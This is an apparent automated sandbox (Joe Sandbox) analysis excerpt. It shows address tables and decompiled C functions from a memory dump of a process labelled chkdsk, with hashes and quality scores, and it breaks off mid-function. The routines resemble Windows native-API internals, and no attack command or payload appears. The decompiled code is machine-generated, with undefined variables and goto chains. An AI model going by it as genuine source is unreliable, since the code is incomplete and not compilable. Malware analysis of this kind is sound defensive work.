                                                      0x04db04a6
                                                      0x04df4d2c
                                                      0x04df4d37
                                                      0x04df4d39
                                                      0x04df4d3b
                                                      0x00000000
                                                      0x00000000
                                                      0x04df4d41
                                                      0x04df4d48
                                                      0x04db0527
                                                      0x04db052b
                                                      0x04db052d
                                                      0x04db0530
                                                      0x04db0530
                                                      0x00000000
                                                      0x04db052b
                                                      0x04df4d4e
                                                      0x04db04ac
                                                      0x04db04ac
                                                      0x04db04af
                                                      0x04db04b2
                                                      0x04db04b7
                                                      0x04db04b9
                                                      0x04db04bb
                                                      0x04db04bd
                                                      0x04db04bf
                                                      0x04db04c5
                                                      0x04db04c9
                                                      0x04df4d53
                                                      0x04df4d59
                                                      0x04df4db9
                                                      0x04df4dba
                                                      0x04df4dbf
                                                      0x04df4dc2
                                                      0x04df4dc4
                                                      0x04df4dc7
                                                      0x04df4dce
                                                      0x00000000
                                                      0x04df4dce
                                                      0x04df4d5b
                                                      0x04df4d61
                                                      0x00000000
                                                      0x00000000
                                                      0x04df4d63
                                                      0x04df4d69
                                                      0x00000000
                                                      0x00000000
                                                      0x04df4d6b
                                                      0x04df4d6e
                                                      0x04df4d74
                                                      0x04df4d76
                                                      0x04df4d7c
                                                      0x04df4d7e
                                                      0x04df4d84
                                                      0x04df4d89
                                                      0x04df4d8c
                                                      0x04df4d8d
                                                      0x04df4d92
                                                      0x04df4d95
                                                      0x04df4d96
                                                      0x04df4d98
                                                      0x04df4d9a
                                                      0x04df4d9f
                                                      0x04df4da4
                                                      0x04df4da6
                                                      0x04df4da8
                                                      0x04df4daf
                                                      0x04df4db1
                                                      0x04df4db1
                                                      0x04df4daf
                                                      0x04df4da6
                                                      0x04df4d84
                                                      0x04df4d7c
                                                      0x00000000
                                                      0x04df4d74
                                                      0x04db04d6
                                                      0x04df4de1
                                                      0x04db04dc
                                                      0x04db04dc
                                                      0x04db04dc
                                                      0x04db04e4
                                                      0x04df4deb
                                                      0x04df4df1
                                                      0x04df4df8
                                                      0x04df4dfe
                                                      0x04df4e03
                                                      0x04df4e05
                                                      0x04df4e17
                                                      0x04df4e07
                                                      0x04df4e10
                                                      0x04df4e10
                                                      0x04df4e1c
                                                      0x04df4e1f
                                                      0x04df4e35
                                                      0x04df4e35
                                                      0x04df4e1f
                                                      0x04df4df8
                                                      0x04db04f1
                                                      0x04db04fa
                                                      0x04df4e3f
                                                      0x04df4e47
                                                      0x04df4e5b
                                                      0x04df4e61
                                                      0x04df4e67
                                                      0x04df4e69
                                                      0x04df4e71
                                                      0x04df4e73
                                                      0x04db0500
                                                      0x04db0500
                                                      0x04db0500
                                                      0x04db04fa
                                                      0x04db0508
                                                      0x04db051d
                                                      0x04db051d
                                                      0x04db051f
                                                      0x04db0524
                                                      0x00000000
                                                      0x04db0524
                                                      0x04db0515
                                                      0x04db0517
                                                      0x04df4e7a
                                                      0x04df4e7c
                                                      0x00000000
                                                      0x00000000
                                                      0x04df4e85
                                                      0x00000000
                                                      0x04df4e85
                                                      0x00000000
                                                      0x04db0517

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76a3c2dce6aa29a46249d2d13b76bebfa2b3e695e347b9e287e57cf131f38cf1
                                                      • Instruction ID: ca2db3018ffe31c02a899a26a5bce174b76e7087355d78ea038674fe817cdc55
                                                      • Opcode Fuzzy Hash: 76a3c2dce6aa29a46249d2d13b76bebfa2b3e695e347b9e287e57cf131f38cf1
                                                      • Instruction Fuzzy Hash: F491B631B00255EFEB329A68CC48BAF77A4FB05728F064265EA91A72D1E774BD40C7D1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 67%
                                                      			E04D8C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                                      				signed int _v8;
                                                      				char _v1036;
                                                      				signed int _v1040;
                                                      				char _v1048;
                                                      				signed int _v1052;
                                                      				signed char _v1056;
                                                      				void* _v1058;
                                                      				char _v1060;
                                                      				signed int _v1064;
                                                      				void* _v1068;
                                                      				intOrPtr _v1072;
                                                      				void* _v1084;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				intOrPtr _t70;
                                                      				intOrPtr _t72;
                                                      				signed int _t74;
                                                      				intOrPtr _t77;
                                                      				signed int _t78;
                                                      				signed int _t81;
                                                      				void* _t101;
                                                      				signed int _t102;
                                                      				signed int _t107;
                                                      				signed int _t109;
                                                      				signed int _t110;
                                                      				signed char _t111;
                                                      				signed int _t112;
                                                      				signed int _t113;
                                                      				signed int _t114;
                                                      				intOrPtr _t116;
                                                      				void* _t117;
                                                      				char _t118;
                                                      				void* _t120;
                                                      				char _t121;
                                                      				signed int _t122;
                                                      				signed int _t123;
                                                      				signed int _t125;
                                                      
                                                      				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                                      				_v8 =  *0x4e7d360 ^ _t125;
                                                      				_t116 = _a4;
                                                      				_v1056 = _a16;
                                                      				_v1040 = _a24;
                                                      				if(E04D96D30( &_v1048, _a8) < 0) {
                                                      					L4:
                                                      					_pop(_t117);
                                                      					_pop(_t120);
                                                      					_pop(_t101);
                                                      					return E04DCB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                                      				}
                                                      				_t70 = _a20;
                                                      				if(_t70 >= 0x3f4) {
                                                      					_t121 = _t70 + 0xc;
                                                      					L19:
                                                      					_t107 =  *( *[fs:0x30] + 0x18);
                                                      					__eflags = _t107;
                                                      					if(_t107 == 0) {
                                                      						L60:
                                                      						_t68 = 0xc0000017;
                                                      						goto L4;
                                                      					}
                                                      					_t72 =  *0x4e77b9c; // 0x0
                                                      					_t74 = L04DA4620(_t107, _t107, _t72 + 0x180000, _t121);
                                                      					_v1064 = _t74;
                                                      					__eflags = _t74;
                                                      					if(_t74 == 0) {
                                                      						goto L60;
                                                      					}
                                                      					_t102 = _t74;
                                                      					_push( &_v1060);
                                                      					_push(_t121);
                                                      					_push(_t74);
                                                      					_push(2);
                                                      					_push( &_v1048);
                                                      					_push(_t116);
                                                      					_t122 = E04DC9650();
                                                      					__eflags = _t122;
                                                      					if(_t122 >= 0) {
                                                      						L7:
                                                      						_t114 = _a12;
                                                      						__eflags = _t114;
                                                      						if(_t114 != 0) {
                                                      							_t77 = _a20;
                                                      							L26:
                                                      							_t109 =  *(_t102 + 4);
                                                      							__eflags = _t109 - 3;
                                                      							if(_t109 == 3) {
                                                      								L55:
                                                      								__eflags = _t114 - _t109;
                                                      								if(_t114 != _t109) {
                                                      									L59:
                                                      									_t122 = 0xc0000024;
                                                      									L15:
                                                      									_t78 = _v1052;
                                                      									__eflags = _t78;
                                                      									if(_t78 != 0) {
                                                      										L04DA77F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                                      									}
                                                      									_t68 = _t122;
                                                      									goto L4;
                                                      								}
                                                      								_t110 = _v1056;
                                                      								_t118 =  *((intOrPtr*)(_t102 + 8));
                                                      								_v1060 = _t118;
                                                      								__eflags = _t110;
                                                      								if(_t110 == 0) {
                                                      									L10:
                                                      									_t122 = 0x80000005;
                                                      									L11:
                                                      									_t81 = _v1040;
                                                      									__eflags = _t81;
                                                      									if(_t81 == 0) {
                                                      										goto L15;
                                                      									}
                                                      									__eflags = _t122;
                                                      									if(_t122 >= 0) {
                                                      										L14:
                                                      										 *_t81 = _t118;
                                                      										goto L15;
                                                      									}
                                                      									__eflags = _t122 - 0x80000005;
                                                      									if(_t122 != 0x80000005) {
                                                      										goto L15;
                                                      									}
                                                      									goto L14;
                                                      								}
                                                      								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                                      								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                                      									goto L10;
                                                      								}
                                                      								_push( *((intOrPtr*)(_t102 + 8)));
                                                      								_t59 = _t102 + 0xc; // 0xc
                                                      								_push(_t110);
                                                      								L54:
                                                      								E04DCF3E0();
                                                      								_t125 = _t125 + 0xc;
                                                      								goto L11;
                                                      							}
                                                      							__eflags = _t109 - 7;
                                                      							if(_t109 == 7) {
                                                      								goto L55;
                                                      							}
                                                      							_t118 = 4;
                                                      							__eflags = _t109 - _t118;
                                                      							if(_t109 != _t118) {
                                                      								__eflags = _t109 - 0xb;
                                                      								if(_t109 != 0xb) {
                                                      									__eflags = _t109 - 1;
                                                      									if(_t109 == 1) {
                                                      										__eflags = _t114 - _t118;
                                                      										if(_t114 != _t118) {
                                                      											_t118 =  *((intOrPtr*)(_t102 + 8));
                                                      											_v1060 = _t118;
                                                      											__eflags = _t118 - _t77;
                                                      											if(_t118 > _t77) {
                                                      												goto L10;
                                                      											}
                                                      											_push(_t118);
                                                      											_t56 = _t102 + 0xc; // 0xc
                                                      											_push(_v1056);
                                                      											goto L54;
                                                      										}
                                                      										__eflags = _t77 - _t118;
                                                      										if(_t77 != _t118) {
                                                      											L34:
                                                      											_t122 = 0xc0000004;
                                                      											goto L15;
                                                      										}
                                                      										_t111 = _v1056;
                                                      										__eflags = _t111 & 0x00000003;
                                                      										if((_t111 & 0x00000003) == 0) {
                                                      											_v1060 = _t118;
                                                      											__eflags = _t111;
                                                      											if(__eflags == 0) {
                                                      												goto L10;
                                                      											}
                                                      											_t42 = _t102 + 0xc; // 0xc
                                                      											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                                      											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                                      											_push(_t111);
                                                      											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                                      											_push(0);
                                                      											_push( &_v1048);
                                                      											_t122 = E04DC13C0(_t102, _t118, _t122, __eflags);
                                                      											L44:
                                                      											_t118 = _v1072;
                                                      											goto L11;
                                                      										}
                                                      										_t122 = 0x80000002;
                                                      										goto L15;
                                                      									}
                                                      									_t122 = 0xc0000024;
                                                      									goto L44;
                                                      								}
                                                      								__eflags = _t114 - _t109;
                                                      								if(_t114 != _t109) {
                                                      									goto L59;
                                                      								}
                                                      								_t118 = 8;
                                                      								__eflags = _t77 - _t118;
                                                      								if(_t77 != _t118) {
                                                      									goto L34;
                                                      								}
                                                      								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                      								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                      									goto L34;
                                                      								}
                                                      								_t112 = _v1056;
                                                      								_v1060 = _t118;
                                                      								__eflags = _t112;
                                                      								if(_t112 == 0) {
                                                      									goto L10;
                                                      								}
                                                      								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                                      								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                                      								goto L11;
                                                      							}
                                                      							__eflags = _t114 - _t118;
                                                      							if(_t114 != _t118) {
                                                      								goto L59;
                                                      							}
                                                      							__eflags = _t77 - _t118;
                                                      							if(_t77 != _t118) {
                                                      								goto L34;
                                                      							}
                                                      							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                      							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                      								goto L34;
                                                      							}
                                                      							_t113 = _v1056;
                                                      							_v1060 = _t118;
                                                      							__eflags = _t113;
                                                      							if(_t113 == 0) {
                                                      								goto L10;
                                                      							}
                                                      							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                                      							goto L11;
                                                      						}
                                                      						_t118 =  *((intOrPtr*)(_t102 + 8));
                                                      						__eflags = _t118 - _a20;
                                                      						if(_t118 <= _a20) {
                                                      							_t114 =  *(_t102 + 4);
                                                      							_t77 = _t118;
                                                      							goto L26;
                                                      						}
                                                      						_v1060 = _t118;
                                                      						goto L10;
                                                      					}
                                                      					__eflags = _t122 - 0x80000005;
                                                      					if(_t122 != 0x80000005) {
                                                      						goto L15;
                                                      					}
                                                      					L04DA77F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                                      					L18:
                                                      					_t121 = _v1060;
                                                      					goto L19;
                                                      				}
                                                      				_push( &_v1060);
                                                      				_push(0x400);
                                                      				_t102 =  &_v1036;
                                                      				_push(_t102);
                                                      				_push(2);
                                                      				_push( &_v1048);
                                                      				_push(_t116);
                                                      				_t122 = E04DC9650();
                                                      				if(_t122 >= 0) {
                                                      					__eflags = 0;
                                                      					_v1052 = 0;
                                                      					goto L7;
                                                      				}
                                                      				if(_t122 == 0x80000005) {
                                                      					goto L18;
                                                      				}
                                                      				goto L4;
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6263b71a4c50f68eb0d5cdd2fd43b3b2221963a8b9844593be69959fc60dfdd1
                                                      • Instruction ID: 2ccccf200cf361920d18c469afa3cb68135d2585aa23043e6f2f81ed19cd60e7
                                                      • Opcode Fuzzy Hash: 6263b71a4c50f68eb0d5cdd2fd43b3b2221963a8b9844593be69959fc60dfdd1
                                                      • Instruction Fuzzy Hash: 228170756542029BDB35CF14CC80ABA73A5FB85754F1A486EEE999B240E330FD41CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 79%
                                                      			E04E06DC9(signed int __ecx, void* __edx) {
                                                      				unsigned int _v8;
                                                      				intOrPtr _v12;
                                                      				signed int _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				char _v32;
                                                      				char _v36;
                                                      				char _v40;
                                                      				char _v44;
                                                      				char _v48;
                                                      				char _v52;
                                                      				char _v56;
                                                      				char _v60;
                                                      				void* _t87;
                                                      				void* _t95;
                                                      				signed char* _t96;
                                                      				signed int _t107;
                                                      				signed int _t136;
                                                      				signed char* _t137;
                                                      				void* _t157;
                                                      				void* _t161;
                                                      				void* _t167;
                                                      				intOrPtr _t168;
                                                      				void* _t174;
                                                      				void* _t175;
                                                      				signed int _t176;
                                                      				void* _t177;
                                                      
                                                      				_t136 = __ecx;
                                                      				_v44 = 0;
                                                      				_t167 = __edx;
                                                      				_v40 = 0;
                                                      				_v36 = 0;
                                                      				_v32 = 0;
                                                      				_v60 = 0;
                                                      				_v56 = 0;
                                                      				_v52 = 0;
                                                      				_v48 = 0;
                                                      				_v16 = __ecx;
                                                      				_t87 = L04DA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                                      				_t175 = _t87;
                                                      				if(_t175 != 0) {
                                                      					_t11 = _t175 + 0x30; // 0x30
                                                      					 *((short*)(_t175 + 6)) = 0x14d4;
                                                      					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                                      					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                                      					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                                      					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                                      					E04E06B4C(_t167, _t11, 0x214,  &_v8);
                                                      					_v12 = _v8 + 0x10;
                                                      					_t95 = E04DA7D50();
                                                      					_t137 = 0x7ffe0384;
                                                      					if(_t95 == 0) {
                                                      						_t96 = 0x7ffe0384;
                                                      					} else {
                                                      						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                      					}
                                                      					_push(_t175);
                                                      					_push(_v12);
                                                      					_push(0x402);
                                                      					_push( *_t96 & 0x000000ff);
                                                      					E04DC9AE0();
                                                      					_t87 = L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                                      					_t176 = _v16;
                                                      					if((_t176 & 0x00000100) != 0) {
                                                      						_push( &_v36);
                                                      						_t157 = 4;
                                                      						_t87 = E04E0795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                                      						if(_t87 >= 0) {
                                                      							_v24 = E04E0795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                                      							_v28 = E04E0795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                                      							_push( &_v52);
                                                      							_t161 = 5;
                                                      							_t168 = E04E0795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                                      							_v20 = _t168;
                                                      							_t107 = L04DA4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                                      							_v16 = _t107;
                                                      							if(_t107 != 0) {
                                                      								_v8 = _v8 & 0x00000000;
                                                      								 *(_t107 + 0x20) = _t176;
                                                      								 *((short*)(_t107 + 6)) = 0x14d5;
                                                      								_t47 = _t107 + 0x24; // 0x24
                                                      								_t177 = _t47;
                                                      								E04E06B4C( &_v36, _t177, 0xc78,  &_v8);
                                                      								_t51 = _v8 + 4; // 0x4
                                                      								_t178 = _t177 + (_v8 >> 1) * 2;
                                                      								_v12 = _t51;
                                                      								E04E06B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                      								_v12 = _v12 + _v8;
                                                      								E04E06B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                      								_t125 = _v8;
                                                      								_v12 = _v12 + _v8;
                                                      								E04E06B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                                      								_t174 = _v12 + _v8;
                                                      								if(E04DA7D50() != 0) {
                                                      									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                      								}
                                                      								_push(_v16);
                                                      								_push(_t174);
                                                      								_push(0x402);
                                                      								_push( *_t137 & 0x000000ff);
                                                      								E04DC9AE0();
                                                      								L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                                      								_t168 = _v20;
                                                      							}
                                                      							_t87 = L04DA2400( &_v36);
                                                      							if(_v24 >= 0) {
                                                      								_t87 = L04DA2400( &_v44);
                                                      							}
                                                      							if(_t168 >= 0) {
                                                      								_t87 = L04DA2400( &_v52);
                                                      							}
                                                      							if(_v28 >= 0) {
                                                      								return L04DA2400( &_v60);
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				return _t87;
                                                      			}

                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                      • Instruction ID: 3133d67f9782e375224b352801b40c5c57b2c7161a1158c4cd8694af81ea186b
                                                      • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                      • Instruction Fuzzy Hash: 73716C71A00209EFDB10DFA5C984AEEBBB9FF48714F148169E515E7290DB34FA51CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 39%
                                                      			E04E1B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                                      				char _v8;
                                                      				signed int _v12;
                                                      				signed int _t80;
                                                      				signed int _t83;
                                                      				intOrPtr _t89;
                                                      				signed int _t92;
                                                      				signed char _t106;
                                                      				signed int* _t107;
                                                      				intOrPtr _t108;
                                                      				intOrPtr _t109;
                                                      				signed int _t114;
                                                      				void* _t115;
                                                      				void* _t117;
                                                      				void* _t119;
                                                      				void* _t122;
                                                      				signed int _t123;
                                                      				signed int* _t124;
                                                      
                                                      				_t106 = _a12;
                                                      				if((_t106 & 0xfffffffc) != 0) {
                                                      					return 0xc000000d;
                                                      				}
                                                      				if((_t106 & 0x00000002) != 0) {
                                                      					_t106 = _t106 | 0x00000001;
                                                      				}
                                                      				_t109 =  *0x4e77b9c; // 0x0
                                                      				_t124 = L04DA4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                                      				if(_t124 != 0) {
                                                      					 *_t124 =  *_t124 & 0x00000000;
                                                      					_t124[1] = _t124[1] & 0x00000000;
                                                      					_t124[4] = _t124[4] & 0x00000000;
                                                      					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                                      						L13:
                                                      						_push(_t124);
                                                      						if((_t106 & 0x00000002) != 0) {
                                                      							_push(0x200);
                                                      							_push(0x28);
                                                      							_push(0xffffffff);
                                                      							_t122 = E04DC9800();
                                                      							if(_t122 < 0) {
                                                      								L33:
                                                      								if((_t124[4] & 0x00000001) != 0) {
                                                      									_push(4);
                                                      									_t64 =  &(_t124[1]); // 0x4
                                                      									_t107 = _t64;
                                                      									_push(_t107);
                                                      									_push(5);
                                                      									_push(0xfffffffe);
                                                      									E04DC95B0();
                                                      									if( *_t107 != 0) {
                                                      										_push( *_t107);
                                                      										E04DC95D0();
                                                      									}
                                                      								}
                                                      								_push(_t124);
                                                      								_push(0);
                                                      								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                      								L37:
                                                      								L04DA77F0();
                                                      								return _t122;
                                                      							}
                                                      							_t124[4] = _t124[4] | 0x00000002;
                                                      							L18:
                                                      							_t108 = _a8;
                                                      							_t29 =  &(_t124[0x105]); // 0x414
                                                      							_t80 = _t29;
                                                      							_t30 =  &(_t124[5]); // 0x14
                                                      							_t124[3] = _t80;
                                                      							_t123 = 0;
                                                      							_t124[2] = _t30;
                                                      							 *_t80 = _t108;
                                                      							if(_t108 == 0) {
                                                      								L21:
                                                      								_t112 = 0x400;
                                                      								_push( &_v8);
                                                      								_v8 = 0x400;
                                                      								_push(_t124[2]);
                                                      								_push(0x400);
                                                      								_push(_t124[3]);
                                                      								_push(0);
                                                      								_push( *_t124);
                                                      								_t122 = E04DC9910();
                                                      								if(_t122 != 0xc0000023) {
                                                      									L26:
                                                      									if(_t122 != 0x106) {
                                                      										L40:
                                                      										if(_t122 < 0) {
                                                      											L29:
                                                      											_t83 = _t124[2];
                                                      											if(_t83 != 0) {
                                                      												_t59 =  &(_t124[5]); // 0x14
                                                      												if(_t83 != _t59) {
                                                      													L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                                      												}
                                                      											}
                                                      											_push( *_t124);
                                                      											E04DC95D0();
                                                      											goto L33;
                                                      										}
                                                      										 *_a16 = _t124;
                                                      										return 0;
                                                      									}
                                                      									if(_t108 != 1) {
                                                      										_t122 = 0;
                                                      										goto L40;
                                                      									}
                                                      									_t122 = 0xc0000061;
                                                      									goto L29;
                                                      								} else {
                                                      									goto L22;
                                                      								}
                                                      								while(1) {
                                                      									L22:
                                                      									_t89 =  *0x4e77b9c; // 0x0
                                                      									_t92 = L04DA4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                                      									_t124[2] = _t92;
                                                      									if(_t92 == 0) {
                                                      										break;
                                                      									}
                                                      									_t112 =  &_v8;
                                                      									_push( &_v8);
                                                      									_push(_t92);
                                                      									_push(_v8);
                                                      									_push(_t124[3]);
                                                      									_push(0);
                                                      									_push( *_t124);
                                                      									_t122 = E04DC9910();
                                                      									if(_t122 != 0xc0000023) {
                                                      										goto L26;
                                                      									}
                                                      									L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                                      								}
                                                      								_t122 = 0xc0000017;
                                                      								goto L26;
                                                      							}
                                                      							_t119 = 0;
                                                      							do {
                                                      								_t114 = _t124[3];
                                                      								_t119 = _t119 + 0xc;
                                                      								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                                      								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                                      								_t123 = _t123 + 1;
                                                      								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                                      							} while (_t123 < _t108);
                                                      							goto L21;
                                                      						}
                                                      						_push(0x28);
                                                      						_push(3);
                                                      						_t122 = E04D8A7B0();
                                                      						if(_t122 < 0) {
                                                      							goto L33;
                                                      						}
                                                      						_t124[4] = _t124[4] | 0x00000001;
                                                      						goto L18;
                                                      					}
                                                      					if((_t106 & 0x00000001) == 0) {
                                                      						_t115 = 0x28;
                                                      						_t122 = E04E1E7D3(_t115, _t124);
                                                      						if(_t122 < 0) {
                                                      							L9:
                                                      							_push(_t124);
                                                      							_push(0);
                                                      							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                      							goto L37;
                                                      						}
                                                      						L12:
                                                      						if( *_t124 != 0) {
                                                      							goto L18;
                                                      						}
                                                      						goto L13;
                                                      					}
                                                      					_t15 =  &(_t124[1]); // 0x4
                                                      					_t117 = 4;
                                                      					_t122 = E04E1E7D3(_t117, _t15);
                                                      					if(_t122 >= 0) {
                                                      						_t124[4] = _t124[4] | 0x00000001;
                                                      						_v12 = _v12 & 0x00000000;
                                                      						_push(4);
                                                      						_push( &_v12);
                                                      						_push(5);
                                                      						_push(0xfffffffe);
                                                      						E04DC95B0();
                                                      						goto L12;
                                                      					}
                                                      					goto L9;
                                                      				} else {
                                                      					return 0xc0000017;
                                                      				}
                                                      			}


                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1ab2fa7ccacc69eecd21a2dc32abf0c5c46cb73ef188c12187c777a11c1256e
                                                      • Instruction ID: 3400055d85d05549add731a88ffbcac5412c0a228e8e361c2a0ec132bbe9c8b0
                                                      • Opcode Fuzzy Hash: c1ab2fa7ccacc69eecd21a2dc32abf0c5c46cb73ef188c12187c777a11c1256e
                                                      • Instruction Fuzzy Hash: 2D71FD32280701EFE731CF25C844FAABBA5EF44728F144529E6958B6B0EB75F941CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 80%
                                                      			E04D852A5(char __ecx) {
                                                      				char _v20;
                                                      				char _v28;
                                                      				char _v29;
                                                      				void* _v32;
                                                      				void* _v36;
                                                      				void* _v37;
                                                      				void* _v38;
                                                      				void* _v40;
                                                      				void* _v46;
                                                      				void* _v64;
                                                      				void* __ebx;
                                                      				intOrPtr* _t49;
                                                      				signed int _t53;
                                                      				short _t85;
                                                      				signed int _t87;
                                                      				signed int _t88;
                                                      				signed int _t89;
                                                      				intOrPtr _t101;
                                                      				intOrPtr* _t102;
                                                      				intOrPtr* _t104;
                                                      				signed int _t106;
                                                      				void* _t108;
                                                      
                                                      				_t93 = __ecx;
                                                      				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                      				_push(_t88);
                                                      				_v29 = __ecx;
                                                      				_t89 = _t88 | 0xffffffff;
                                                      				while(1) {
                                                      					E04D9EEF0(0x4e779a0);
                                                      					_t104 =  *0x4e78210; // 0x302bb0
                                                      					if(_t104 == 0) {
                                                      						break;
                                                      					}
                                                      					asm("lock inc dword [esi]");
                                                      					_t2 = _t104 + 8; // 0x28000000
                                                      					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
                                                      					E04D9EB70(_t93, 0x4e779a0);
                                                      					if( *((char*)(_t108 + 0xf)) != 0) {
                                                      						_t101 =  *0x7ffe02dc;
                                                      						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                      						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                      							L9:
                                                      							_push(0);
                                                      							_push(0);
                                                      							_push(0);
                                                      							_push(0);
                                                      							_push(0x90028);
                                                      							_push(_t108 + 0x20);
                                                      							_push(0);
                                                      							_push(0);
                                                      							_push(0);
                                                      							_t10 = _t104 + 4; // 0x0
                                                      							_push( *_t10);
                                                      							_t53 = E04DC9890();
                                                      							__eflags = _t53;
                                                      							if(_t53 >= 0) {
                                                      								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                      								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                      									E04D9EEF0(0x4e779a0);
                                                      									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                      									E04D9EB70(0, 0x4e779a0);
                                                      								}
